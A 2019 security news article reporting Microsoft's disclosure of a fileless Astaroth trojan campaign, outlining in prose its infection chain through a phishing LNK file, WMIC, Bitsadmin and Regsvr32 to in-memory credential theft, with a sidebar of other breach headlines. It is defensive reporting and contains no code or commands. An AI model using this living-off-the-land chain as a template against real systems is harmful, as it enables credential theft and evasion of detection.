9 July 2019

Microsoft warns about fileless Astaroth trojan campaign

Microsoft warns about fileless Astaroth trojan campaign

Microsoft Defender ATP Research Team has disclosed details about an ongoing malware campaign that are distributing the Astaroth malware using fileless and living-off-the-land techniques that make it harder for security researchers and antivirus solutions to detect ongoing attacks.

The Astaroth malware trojan, which has been active since at least 2017, is able to steal users' sensitive information like their credentials, keystrokes, and other data, without dropping any executable file on the disk or installing any software on the victim's machine. All the information is then sent to a remote attacker who can use the data to move laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.

While analysing the Windows telemetry data Andrea Lelli, a member of the Windows Defender ATP team spotted a sudden spike in usage of the Windows Management Instrumentation Command-line (WMIC) – a legitimate tool that ships with all modern versions of Windows. Upon further investigation it became clear that the source of suspicious activity was the campaign that aimed to run the Astaroth backdoor directly in memory.

The discovered malware campaign utilizes several lifeless techniques and a multi-stage infection process that starts with a spear-phishing email containing a malicious link that leaded the potential victims to an LNK file.

After being double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the legitimate Bitsadmin tool.

“Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process,” explained the researcher in a blogpost.

What this means is that the malware doesn’t rely on any traditional methods (vulnerability exploits or trojan downloaders) instead using only legitimate system tools and commands to achieve its goal and to masquerade its activity – a technique that security experts call "living off the land". This technique allows the malware to hide from most end-point antivirus security solutions, which are based on static files analysis.

For traditional, file-centric antivirus solutions the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded, said Lelli. The researcher pointed out that:

“Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”

 

 

Back to the list

Latest Posts

“Agent Smith” malware infected more than 25 million Android devices

“Agent Smith” malware infected more than 25 million Android devices

The malware leverages known Android exploits and automatically replaces installed apps with malicious clones without users’ knowledge or interaction.
15 July 2019
Magecart hackers copromised more than 17K sites via misconfigured Amazon S3 buckets

Magecart hackers copromised more than 17K sites via misconfigured Amazon S3 buckets

Since the beginning of the campaign in April 2019 the group has continuously been scanning the Internet for insecure Amazon S3 buckets.
12 July 2019
Recently patched Windows zero-day exploited in Buhtrap cyber-espionage campaign

Recently patched Windows zero-day exploited in Buhtrap cyber-espionage campaign

The exploit for CVE-2019-1132 created by the Buhtrap group relies on popup menu objects.
11 July 2019
Featured vulnerabilities
Denial of service in MatrixSSL
Medium Patched | 15 Jul, 2019
Denial of service in Apple iMessage
Medium Patched | 15 Jul, 2019
Multiple vulnerabilities in Redis
Medium Patched | 11 Jul, 2019
Reverse Tabnabbing in Quill
Low Not Patched | 11 Jul, 2019
Remote code injection in domokeeper
High Not Patched | 11 Jul, 2019